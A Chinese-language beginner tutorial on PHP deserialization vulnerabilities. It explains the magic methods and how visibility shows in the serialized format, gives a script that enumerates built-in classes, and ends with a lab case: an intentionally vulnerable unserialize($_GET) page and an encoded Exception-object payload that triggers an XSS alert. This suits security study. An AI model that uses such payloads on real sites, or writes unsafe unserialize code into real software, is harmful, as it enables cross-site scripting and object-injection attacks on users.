PHP反序列化漏洞(入门)-魔术方法+原生类

魔术方法利用点分析演示：

触发：unserialize函数的变量可控，文件中存在可利用的类，类中有魔术方法。

 

魔术方法：

__construct():      //构造函数，当对象new的时候会自动调用

__destruct()：     //析构函数当对象被销毁时会被自动调用

__wakeup():         //unserialize()时会被自动调用

__invoke():           //当尝试以调用函数的方法调用一个对象时，会被自动调用

__call():                //在对象上下文中调用不可访问的方法时触发

__callStatci():      //在静态上下文中调用不可访问的方法时触发

__get():                //用于从不可访问的属性读取数据

__set():                //用于将数据写入不可访问的属性

__isset():             //在不可访问的属性上调用isset()或empty()触发

__unset():           //在不可访问的属性上使用unset()时触发

__toString():       //把对象当作字符串使用时触发

__sleep():            //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在，该方法会被优先调用

魔术方法功能演示：

__construct()魔术方法：

     实例化对象时被调用.其作用是拿来初始化一些值。

__destruct()魔术方法：

     当删除一个对象或对象操作终止时被调用。其最主要的作用是拿来做垃圾回收机制。

实列化对象，主动销毁：

主动销毁执行顺序：先调用销毁方法在结束程序

自动销毁：

自动销毁执行顺序：先结束程序再调用销毁方法

__toString()魔术方法：在对象当做字符串的时候会被调用

把对象当作字符串输出

就会调用__toString()函数

__CALL ()魔术方法：

        调用某个方法， 若方法存在，则直接调用；若不存在，则会去调用__call函数。

方法存在：

正常调用

方法不存在：

调用__call()函数

__get() 魔术方法：

       读取一个对象的属性时，若属性存在，则直接返回属性值；若不存在，则会调用__get()函数

属性存在：

返回属性值

属性不存在：

调用__get函数

__set()魔术方法：

    设置一个对象的属性时， 若属性存在，则直接赋值；若不存在，则会调用__set函数。

属性存在：

直接赋值

属性不存在：

调用__set函数

__sleep()魔术方法：serialize之前被调用，可以指定要序列化的对象属性。

不使用序列化：

不会调用__sleep()

使用了序列化：

调用__sleep()函数

__wakeup()魔术方法：反序列化恢复对象之前调用该方法

使用了反序列化：

调用__wakeup()函数

__isset()魔术方法:

      检测对象的某个属性是否存在时执行此函数。当对不可访问属性调用 isset() 或 empty() 时，__isset() 会被调用

对不可访问属性(private私有属性)调用isset()：

就会调用__isset()函数

对可被访问属性调用isset()：

不会调用__isset()函数

__unset()魔术方法：

        在不可访问的属性上使用unset()时触发 销毁对象的某个属性时执行此函数

对象变量属性：

        public(公有的)：在本类内部、外部类、子类都可以访问

        protect(受保护的)：只有本类或子类或父类中可以访问

        private(私有的)：只有本类内部可以使用

对三个属性使用unset():

只调用了两次__unset()，因为有一次是可访问属性（public公有属性）

__invoke()魔术方法：将对象当做函数来使用时执行此方法，通常不推荐这样做。

把对象当作函数引用：

就会自动调用__invoke()函数

不同变量属性导致序列化数据显示不同：

private属性：序列化的时候格式是%00类名%00成员名

protect属性：序列化的时候格式是%00*%00成员名

 

 

public private protected序列化格式说明：

序列化格式

PHP原生类

     原生类就是php内置类，不用定义php自带的类，即不需要在当前脚本写出，但也可以实例化的类

魔术方法的原生类

执行代码查看：

<?php

$classes = get_declared_classes();

foreach ($classes as $class) {

    $methods = get_class_methods($class);

    foreach ($methods as $method) {

        if (in_array($method, array(

            '__destruct',

            '__toString',

            '__wakeup',

            '__call',

            '__callStatic',

            '__get',

            '__set',

            '__isset',

            '__unset',

            '__invoke',

            '__set_state'

        ))) {

            print $class . '::' . $method . "\n";

        }

    }

}

案例：原生类实现xss弹窗

案例代码：

<?php

highlight_file(__file__);

$a = unserialize($_GET['k']);

echo $a;

?>

1.分析代码可知：$a对象被当作字符串输出。

因为__toString()魔术方法是在把对象当做字符串使用的时候会被调用，所以这里会触发__toString()魔术方法

但是因为代码里面没有__toString()魔术方法，所以可以考虑使用__toString()的原生类实现xss弹窗

2.执行查看原生类的代码，查看__toString()原生类

只查看__toString()，所以注释其他

执行查看

3.浏览器搜索：利用php原生类进行xss。

成功获取到构造代码：https://www.anquanke.com/post/id/264823#h3-8

代码：

<?php

$a=new Exception("<script>alert('xiaoheizi')</script>");

echo urlencode(serialize($a));

?>

4.利用浏览器php在线执行网站，执行代码获取poc

poc：

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A35%3A%22%3Cscript%3Ealert%28%27xiaoheizi%27%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A15%3A%22%2Fbox%2Fscript.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

5.案例页面传递参数值为poc，成功xss弹窗